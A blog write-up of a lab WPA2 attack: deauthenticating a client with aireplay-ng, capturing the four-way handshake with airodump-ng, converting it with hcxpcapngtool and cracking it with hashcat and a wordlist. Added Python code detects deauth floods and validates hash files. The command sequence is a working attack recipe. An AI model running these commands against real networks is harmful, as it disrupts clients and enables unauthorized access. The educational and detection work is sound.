
Capturing and Breaking WPA2 Wi-Fi Passwords Via 4-way-handshake

  • Writer: Alek Norris
  • Dec 18, 2024
  • 4 min read

Updated: Dec 19, 2024

As a kid, and even as I’ve gotten older, I’ve always been fascinated by movies—especially the ones that make it seem so easy to break into someone’s Wi-Fi. This curiosity led me on a personal journey to see if it’s really that simple.


What I found was surprising: before WPA2, it truly was that easy. However, with the improvements made in WPA2, and the upcoming WPA3, the days of breaking in within a couple of minutes are coming to an end.


With that in mind, I decided to put together a quick write-up and report on what I did and how it turned out. If you’re curious or want to try it yourself, feel free to reach out with any questions!



Description of the Simulated Network:

For this demonstration, we utilized a computer running a live version of Kali Linux. The setup included the following components:


  1. Router/Access Point (AP): A modern wireless router configured for testing purposes, using WPA2.

  2. Client Device: A wireless-enabled device acting as the target for the attack. It should already be connected to the Access Point.

  3. Wireless Adapter: A compatible adapter capable of monitor mode and packet injection.


Topology Diagram/Network Map:

The topology consisted of a single Access Point (AP) with connected client devices. The attacking device was positioned to monitor and interfere with the communication between the AP and its clients. Please refer to Figure 2.1 for additional information and clarification.

Figure 1: General Lab Setup Diagram

Step-by-Step Attack Execution

We will now begin the exploitation process. During this process, we will:


  1. Prepare the Environment: Set up the tools and configure the wireless adapter.


  2. Identify a Target: Locate and choose an access point and a client device within range.


  3. Deauthenticate the Client: Force the client to disconnect from the access point using packet injection.


  4. Capture the Handshake: Monitor the connection and capture the WPA handshake packets during reconnection.


  5. Brute Force the Passphrase: Use a wordlist to attempt cracking the captured handshake.


Preparing the Environment

Before starting any steps, we must ensure that our environment is properly configured. This includes shutting down any currently running network-related services that might affect the wireless adapter’s performance or configuration, as well as putting the wireless interface into monitor mode so that it can capture traffic.


The following steps will use a "What" heading to describe the task and a "How To" command to show the exact steps.


  1. Shut down interfering services:

    1. systemctl stop wpa_supplicant NetworkManager


  2. Identify the wireless interface:

    1. iwconfig


Identifying a Target

We will now identify our target. For this we will use a tool called FERN-wifi-cracker, as it condenses this initial step into an easy-to-use GUI. During this step we will identify and record the following: Channel: the access point's current channel; BSSID: the MAC address of the access point; and MAC: the address of the client (station).


Because FERN is a GUI tool, please refer to Figures 2 and 3 for clarification and visual assistance.


  1. Start FERN

  2. Select Previously Identified Wireless Interface

  3. Begin Scan

  4. Identify SSID to attack

  5. Identify Client to Deauthenticate

  6. Be sure to end FERN and release the interface

Figure 2: Home Panel

Figure 3: Attack Panel

Capturing the Handshake

In this step, we will deauthenticate the client, forcing it to reauthenticate, while monitoring the packets to capture the four-way handshake between the client and the access point.


  1. Open a terminal; optionally open two in order to simplify the process.

  2. Place Interface into Monitor Mode

    1. Disable the interface:

      1. ifconfig <Interface Name> down

    2. Enable monitor mode:

      1. iwconfig <Interface Name> mode monitor

    3. Reactivate the interface:

      1. ifconfig <Interface Name> up


  3. Start Monitoring for the specific handshake:

    1. sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_file> wlan0mon


  4. Deauthenticate a client to force the reauthentication and the sending of the handshake. Note: this may take multiple attempts, as the station must receive the deauthentication frames in order to reauthenticate, and we must also capture the handshake, which may not occur on every reconnect.

    1. sudo aireplay-ng --deauth 10 -a <BSSID> -c <StationID> wlan0mon


  5. Confirm handshake capture:

    1. You may see something in the airodump-ng output along the lines of EAPOL.

    2. You can also check the cap file for the handshake capture.

      1. wireshark <location of output file.cap>

        1. Once opened, apply the display filter eapol.
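The deauthentication step above works only because ordinary WPA2 management frames are unauthenticated, and that is exactly the pattern a wireless IDS looks for. The script below is an added example for the defensive side; it is not part of the original write-up and not code from any tool named on this page. It parses the fixed 802.11 MAC header of raw frames (no radiotap header is assumed) and raises an alert when deauthentication or disassociation frames for one BSSID exceed a threshold inside a short window. All MAC addresses, frames and timestamps are constructed fixtures. 802.11w Protected Management Frames, which WPA3 makes mandatory, cause a client to discard forged deauthentications, which is part of why the author's remark about those quick break-ins coming to an end holds.

```python
import struct
from collections import defaultdict, deque

# 802.11 frame control, byte 0: bits 0-1 version, bits 2-3 type, bits 4-7 subtype.
MGMT = 0          # management frame type
DISASSOC = 10     # management subtype: disassociation
DEAUTH = 12       # management subtype: deauthentication
BEACON = 8        # management subtype: beacon (ignored by the detector)
DATA = 2          # data frame type (ignored by the detector)
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def build_frame(ftype, subtype, dst, src, bssid, reason=None):
    """Constructed 802.11 frame (header + optional reason code), used only as a test fixture."""
    fc0 = (subtype << 4) | (ftype << 2)
    frame = struct.pack("<BBH", fc0, 0, 0)          # frame control, duration
    frame += mac_to_bytes(dst) + mac_to_bytes(src) + mac_to_bytes(bssid)
    frame += struct.pack("<H", 0)                    # sequence control
    if reason is not None:
        frame += struct.pack("<H", reason)           # deauth/disassoc body: reason code
    return frame


def parse_header(frame):
    """Return the fields of the fixed 802.11 header, or None if the frame is too short."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if fc0 & 0x03 != 0:                              # unknown protocol version
        return None
    rec = {
        "type": (fc0 >> 2) & 0x03,
        "subtype": (fc0 >> 4) & 0x0F,
        "dst": mac_to_str(frame[4:10]),
        "src": mac_to_str(frame[10:16]),
        "bssid": mac_to_str(frame[16:22]),
        "reason": None,
    }
    if rec["type"] == MGMT and rec["subtype"] in (DEAUTH, DISASSOC) and len(frame) >= 26:
        rec["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return rec


def detect_deauth_flood(capture, threshold=5, window_s=2.0):
    """capture: iterable of (timestamp_seconds, raw_frame).
    Emits one alert per BSSID the first time `threshold` deauth/disassoc frames
    land inside `window_s` seconds; a real sensor would re-arm after the burst."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, frame in capture:
        rec = parse_header(frame)
        if rec is None or rec["type"] != MGMT or rec["subtype"] not in (DEAUTH, DISASSOC):
            continue
        q = recent[rec["bssid"]]
        q.append((ts, rec["dst"], rec["reason"]))
        while q and ts - q[0][0] > window_s:
            q.popleft()
        if len(q) >= threshold and rec["bssid"] not in alerted:
            alerted.add(rec["bssid"])
            alerts.append({
                "bssid": rec["bssid"],
                "count": len(q),
                "first_ts": q[0][0],
                "last_ts": ts,
                "broadcast": any(d == BROADCAST for _, d, _ in q),   # broadcast deauth hits every client
                "reasons": sorted({r for _, _, r in q if r is not None}),
            })
    return alerts


# Constructed sample capture: one beacon, one data frame, one stray deauth, then a burst
# of deauths spoofed from the AP toward the client and toward broadcast.
AP = "00:11:22:33:44:55"    # constructed BSSID
STA = "66:77:88:99:aa:bb"   # constructed client (station) MAC
SAMPLE_CAPTURE = [
    (0.00, build_frame(MGMT, BEACON, BROADCAST, AP, AP)),
    (0.10, build_frame(DATA, 0, AP, STA, AP)),
    (0.50, build_frame(MGMT, DEAUTH, STA, AP, AP, reason=7)),
]
for i in range(8):
    SAMPLE_CAPTURE.append((1.0 + i * 0.05, build_frame(MGMT, DEAUTH, STA, AP, AP, reason=7)))
    SAMPLE_CAPTURE.append((1.0 + i * 0.05 + 0.01, build_frame(MGMT, DEAUTH, BROADCAST, AP, AP, reason=7)))

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_CAPTURE):
        print(f"deauth flood on {alert['bssid']}: {alert['count']} frames "
              f"in {alert['last_ts'] - alert['first_ts']:.2f}s, broadcast={alert['broadcast']}")
```

The threshold and window are deliberately conservative: a legitimate access point does send the occasional deauthentication (reason code 7, class 3 frame from a non-associated station, is common), so a single frame is normal and only a burst is worth an alert. Feeding this real traffic means stripping the radiotap header that monitor-mode captures prepend; the detector itself needs only the 24-byte MAC header plus the 2-byte reason code.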


Converting Handshake for Brute Force

While the .cap file can be used to brute force directly, the better option is to use a utility called hashcat, which automatically uses GPU acceleration and multithreading to speed up the attempts.


  1. Convert the .cap file to a Hashcat-compatible format using hcxpcapngtool:

    1. hcxpcapngtool -o handshake.22000 handshake-01.cap

  2. Confirm the converted file format:

    1. cat handshake.22000
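The `cat` in the confirmation step shows the raw line, but it helps to know what you are looking at: a mode-22000 line is nine `*`-separated fields, `WPA*TYPE*PMKID_OR_MIC*MAC_AP*MAC_CLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR`, where TYPE `01` is a PMKID entry (last three fields empty) and TYPE `02` is a full 4-way-handshake (EAPOL) entry. The parser below is an added example, not part of this write-up and not hashcat's or hcxtools' own code; the field layout follows hashcat's published format, and every value in the sample lines is constructed (the EAPOL field in particular is a short placeholder, not a real frame). It lets you confirm that the conversion actually produced an EAPOL record for your ESSID rather than only a PMKID, and it reports malformed lines instead of silently skipping them.

```python
import re
from collections import Counter

HEX = re.compile(r"^[0-9a-fA-F]*$")


def _mac(hex12):
    return ":".join(hex12[i:i + 2].lower() for i in range(0, 12, 2))


def parse_22000_line(line):
    """Parse one hashcat mode-22000 line; raises ValueError on anything malformed."""
    parts = line.strip().split("*")
    if len(parts) != 9 or parts[0] != "WPA":
        raise ValueError("expected 9 '*'-separated fields starting with WPA")
    _, kind, mic, mac_ap, mac_client, essid_hex, anonce, eapol, msgpair = parts
    for name, value, length in (("PMKID/MIC", mic, 32), ("MAC_AP", mac_ap, 12), ("MAC_CLIENT", mac_client, 12)):
        if len(value) != length or not HEX.match(value):
            raise ValueError(f"{name} must be {length} hex characters")
    if not HEX.match(essid_hex) or len(essid_hex) % 2 or len(essid_hex) > 64:
        raise ValueError("ESSID must be even-length hex of at most 32 bytes")
    if kind == "01":
        # PMKID entry: the handshake-specific fields must be empty.
        if anonce or eapol or msgpair:
            raise ValueError("PMKID line must have empty ANONCE/EAPOL/MESSAGEPAIR fields")
    elif kind == "02":
        # EAPOL entry: AP nonce, the EAPOL frame (with MIC zeroed) and the message-pair code.
        if len(anonce) != 64 or not HEX.match(anonce):
            raise ValueError("ANONCE must be 64 hex characters")
        if not eapol or len(eapol) % 2 or not HEX.match(eapol):
            raise ValueError("EAPOL must be non-empty even-length hex")
        if len(msgpair) != 2 or not HEX.match(msgpair):
            raise ValueError("MESSAGEPAIR must be 2 hex characters")
    else:
        raise ValueError(f"unknown TYPE field {kind!r}")
    return {
        "kind": "PMKID" if kind == "01" else "EAPOL",
        "essid": bytes.fromhex(essid_hex).decode("utf-8", errors="replace"),
        "ap": _mac(mac_ap),
        "client": _mac(mac_client),
        "eapol_len": len(eapol) // 2,
    }


def summarize_22000(text):
    """Count PMKID and EAPOL entries per (ESSID, AP); return (summary, [(lineno, error), ...])."""
    summary = {}
    errors = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            rec = parse_22000_line(line)
        except ValueError as exc:
            errors.append((lineno, str(exc)))
            continue
        summary.setdefault((rec["essid"], rec["ap"]), Counter())[rec["kind"]] += 1
    return summary, errors


# Constructed sample file: one PMKID line, one EAPOL line, one malformed line.
_ESSID_HEX = "TestLab".encode().hex()
SAMPLE_22000 = "\n".join([
    "WPA*01*" + "a1" * 16 + "*001122334455*66778899aabb*" + _ESSID_HEX + "***",
    "WPA*02*" + "b2" * 16 + "*001122334455*66778899aabb*" + _ESSID_HEX
    + "*" + "c3" * 32 + "*0103007502010a00*02",
    "WPA*02*short*001122334455*66778899aabb*" + _ESSID_HEX + "****",
])

if __name__ == "__main__":
    summary, errors = summarize_22000(SAMPLE_22000)
    for (essid, ap), counts in summary.items():
        print(f"{essid!r} on {ap}: {dict(counts)}")
    for lineno, err in errors:
        print(f"line {lineno}: {err}")
```

Run it against the real file with `summarize_22000(open("handshake.22000").read())`. If your ESSID shows up with only a PMKID count, the 4-way handshake was not fully captured and the deauthentication step needs repeating; the troubleshooting section below covers the usual cause.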



Brute-Forcing the Passphrase

Using the captured handshake and Hashcat, we can now attempt to brute-force the captured hash of the passphrase. While the time and wordlist used may vary depending on the complexity of the passphrase or the individual's hardware, the actual process remains the same.


  1. Run Hashcat to attempt cracking the passphrase:

    1. hashcat -m 22000 handshake.22000 /usr/share/wordlists/rockyou.txt

  2. View the results upon completion:

    1. hashcat --show -m 22000 handshake.22000


Troubleshooting

While attempting to capture the handshake or during the brute-forcing process, there are many small things that might not work quite right. Below is one of the challenges one might encounter and its corresponding fix.


Problem: Channel hopping issues or not capturing enough of the handshake. If a NIC is attempting to channel hop, the actual handshake packets may be missed, or only a single packet might be captured during monitoring.


Solution: There are a couple of options available to resolve this issue. First, you should try to identify the service currently forcing the wireless adapter to change channels, and disable it. Alternatively, you can lock the wireless adapter to a single channel using iwconfig with the following command: sudo iwconfig wlan0mon channel <channel_number>


Video Demonstration

Below is a video demonstration of the deauthentication process, handshake capture, confirmation via packet inspection, and brute-forcing the password using Hashcat. The password was brute-forced offline, and for this example, it was deliberately placed in the middle of the RockYou.txt wordlist.

